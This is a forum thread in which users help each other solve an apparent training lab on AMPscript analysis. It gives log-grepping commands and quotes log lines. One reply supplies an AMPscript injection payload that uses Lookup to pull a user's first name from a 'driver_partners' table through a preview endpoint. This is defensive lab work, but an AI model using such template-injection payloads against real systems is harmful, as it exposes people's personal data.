Forum Discussion

GusC's avatar
GusC
Icon for Bronze III rankBronze III
5 months ago

Threat Research: AMPscript Analysis

This is one of those labs that I return to periodically and then abandon after half an hour whilst scratching my head........Does anyone have any pointers about how to approach this? Which fields ne...
defensive cyber
steven's avatar
steven
Icon for Silver II rankSilver II
5 months ago

Ok, I have solved the lab again... 
so, lets start... 

first get the ip address: how? count which is the most ip address used... 
something like this will give you some data:

grep -i - * | awk '{print $8}' | sort | uniq -c | sort

once you have the ip address, check again...

ml-user@ampscript-evaluation:~/Desktop/logs$ grep "n.n.n.n" *
api.log.1:2019-01-17 09:37:23,026 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/
api.log.1:2019-01-17 09:37:23,117 - [INFO] - AMPS_test_bed - n.n.n.n requested http://web-hook.imlcabs.iml/preview?….
business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[
api.log.1:2019-01-17 09:37:33,644 - [INFO] - AMPS_test_bed - Processing message from n.n.n.n: %%[
api.log.1:2019-01-17 09:37:33,690 - [INFO] - AMPS_test_bed - n.n.n.n authenticated successfully with contact key abcdefgh-ijkl-mnop-qrts-uvwxyz123456

--> abcdefgh-ijkl-mnop-qrts-uvwxyz123456 will be what you want... that's the lookup key and the test contact key

also note the URL used...:

http://web-hook.imlcabs.iml/preview?….business_unit=&endpoint=&extension=driver_partners&headers=&message=%25%25[

if you check the data, you'll even see the 'Message' used. 

if you do your query (the log will tell you what you need to enter), you'll get an aswer/result like:

{"result":"Hi there I'm DARTH_VADER_YOUR_MASTER and I created this tool.\r"}

(of course it's not Darth Vader) :)

and when you dig further in the log.. around line 940... you'll find the last mesage to re-use and count...

 

  • GusC's avatar
    GusC
    Icon for Bronze III rankBronze III
    5 months ago

    Hi Netcat - yes thats exactly what I mean, I click on "preview" on the page web-hook.imlcabs.iml and I get "" unders JSON etc. 

    Thanks Steven - I had already got Q5 and Q6 - I'm stuck on how to populate the web application to pull back the name of the attacker, using the key 5*** - do you have some info around that? 

     

    • steven's avatar
      steven
      Icon for Silver II rankSilver II
      5 months ago

      so, base for this hack is this --> https://www.assetnote.io/resources/research/gaining-access-to-ubers-user-data-through-ampscript-evaluation

      try for the message:

      Message:
%%[
SET @firstName = Lookup('driver_partners', 'firstname', 'partner_uuid', "5....")
]%%
Hi there I'm %%=V(@firstName)=%% and I created this tool.

      btw, you'll find all the nessesairy messages to solve the lab in the log. maybe you need to use cyberchef and urldecode.

      • GusC's avatar
        GusC
        Icon for Bronze III rankBronze III
        5 months ago

        Thanks Steve I'll give that a go today.

        btw are you mrmouse? you must have a good score in IL!